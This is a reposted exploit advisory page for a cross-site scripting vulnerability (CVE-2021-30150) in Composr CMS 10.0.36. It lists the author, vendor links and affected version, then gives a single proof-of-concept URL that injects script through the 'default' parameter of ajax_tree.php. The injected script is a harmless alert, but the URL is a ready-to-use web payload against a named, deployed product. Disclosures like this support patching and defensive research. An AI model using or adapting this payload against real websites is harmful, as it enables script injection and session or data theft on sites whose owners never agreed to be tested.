Composr CMS 10.0.36 – Cross Site Scripting – Digitalmunition




Exploit/Advisories spider-orange.png

Published on April 7th, 2021 📆 | 7678 Views ⚑

0

Composr CMS 10.0.36 – Cross Site Scripting

# Exploit Title: Composr CMS 10.0.36 - Cross Site Scripting
# Date: 04/06/2021
# Exploit Author: Orion Hridoy
# Vendor Homepage: https://compo.sr/
# Software Link: https://compo.sr/download.htm
# Version: 10.0.36
# Tested on: Windows/Linux
# CVE : CVE-2021-30150

Vulnerable Endpoint:
https://site.com/data/ajax_tree.php?hook=choose_gallery&id=&options=a:5:{s:21:"must_accept_something";b:1;s:6:"purity";b:0;s:14:"addable_filter";b:1;s:6:"filter";N;s:9:"member_id";N;}&default=alert("Hello")
            

Source link

Tagged with:



Leave a Reply